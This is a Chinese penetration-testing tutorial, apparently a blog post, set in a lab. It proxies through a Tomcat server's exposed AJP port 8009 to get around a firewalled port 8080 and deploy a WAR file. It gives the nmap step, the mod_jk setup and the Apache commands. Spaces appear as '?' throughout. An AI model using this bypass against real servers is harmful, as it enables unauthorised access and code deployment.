Tomcat在安裝的時候會有下面的界面,我們通常部署war,用的最多的是默認的8080端口。
可是當8080端口被防火墻封閉的時候,是否還有辦法利用呢?
答案是可以的,可以通過AJP的8009端口,下面是step?by?step。
下面是實驗環境:
192.168.0.102???裝有Tomcat?7的虛擬主機,防火墻封閉8080端口
192.168.0.103???裝有BT5系統的滲透主機
首先nmap掃描,發現8009端口開放
BT5默認apache2是安裝的,我們僅需要安裝mod-jk
#!shell
[email protected]:~#?apt-get?install?libapache2-mod-jk
jk.conf的配置文件如下:
#!shell
[email protected]:/etc/apache2/mods-available#?cat?jk.conf?
#?Update?this?path?to?match?your?conf?directory?location
JkWorkersFile?/etc/apache2/jk_workers.properties
#?Where?to?put?jk?logs
#?Update?this?path?to?match?your?logs?directory?location
JkLogFile?/var/log/apache2/mod_jk.log
#?Set?the?jk?log?level?[debug/error/info]
JkLogLevel?info
#?Select?the?log?format
JkLogStampFormat?"[%a?%b?%d?%H:%M:%S?%Y]"
#?JkOptions?indicate?to?send?SSL?KEY?SIZE,
JkOptions?+ForwardKeySize?+ForwardURICompat?-ForwardDirectories
#?JkRequestLogFormat?set?the?request?format
JkRequestLogFormat?"%w?%V?%T"
#?Shm?log?file
JkShmFile?/var/log/apache2/jk-runtime-status
jk.conf軟連接到/etc/apache2/mods-enabled/目錄
#!shell
ln?-s?/etc/apache2/mods-available/jk.conf?/etc/apache2/mods-enabled/jk.conf
配置?jk_workers.properties
#!shell
[email protected]:/etc/apache2#?cat?jk_workers.properties?
worker.list=ajp13
#?Set?properties?for?worker?named?ajp13?to?use?ajp13?protocol,
#?and?run?on?port?8009
worker.ajp13.type=ajp13
worker.ajp13.host=192.168.0.102???????<\---|這里是要目標主機的IP地址
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300
默認站點的配置
重啟apache
#!shell
sudo?a2enmod?proxy_ajp
sudo?a2enmod?proxy_http
sudo?/etc/init.d/apache2?restart
現在apache的mod_jk模塊就配置好了,訪問192.168.0.103的80端口,就被重定向到192.168.0.102的8009端口了,然后就可以部署war了。
對滲透有興趣的朋友,加我多交流 :)
?